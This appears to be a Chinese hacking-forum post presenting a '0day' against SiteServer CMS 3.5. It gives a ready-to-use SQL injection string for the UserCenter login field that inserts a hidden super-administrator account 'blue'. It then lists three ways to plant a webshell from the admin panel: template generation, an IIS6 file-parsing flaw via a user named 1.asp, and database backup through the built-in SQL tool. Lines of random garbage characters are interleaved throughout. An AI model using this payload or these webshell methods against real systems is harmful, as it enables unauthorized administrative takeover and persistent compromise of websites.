SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

# o/ H( R$ q' b# D0 lstieserver官网:www.siteserver.cn


  Z  q" c" [! \% r
EXP:

" T0 D6 p3 b! ^' ?- U直接访问UserCenter/login.aspx
% Y1 w+ r) M8 f' }: S

- C8 D1 i4 V& d- k2 I
1 m" t# Y% B/ {3 K! g9 {8 ?0 k! G! p用户名处输入：
4 [0 f8 z5 o! y8 c
, I2 c. J* p- u3 |6 ]5 v123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
; C: Z8 }# ], k. l  V3 A4 l  c
- W! q! B6 Q0 l

7 f( h& T3 Q8 r3 b' M) h' g1 a* d密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



# v2 j$ e: j* _# g& K) w之后再访问后台SiteServer/login.aspx用插入的用户登陆

0 o$ U$ ~* d8 d8 I2 y0 N. E8 z; r
) w6 E& A" A9 T8 a2 F
后台拿webshell的三种方法：

! C& l3 y- h) R+ m一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
1 n: e8 ]" I" w, |
成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

0 B, ]3 s, O' D+ [4 [用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
- k9 c8 A* p" f1 b3 B
( d% z( v, F  o! Y1 c/ t" _' s（ps：后台添加用户时不会验证是否含有非法字符）
) r, G: ~+ s, I8 e5 m/ w
4 a, R  i# R' |+ O, P- N% s三、
) @; i; f7 c' z9 J" Y
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
6 E7 W: o( [5 _0 D. n: i
系统工具-》数据库工具-》SQL语句查询
' b# @  s& w6 h5 @" l$ u这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
8 W2 Z, }' V" D$ y
9 l4 q$ V4 ~1 j0 l, u7 T2 W8 A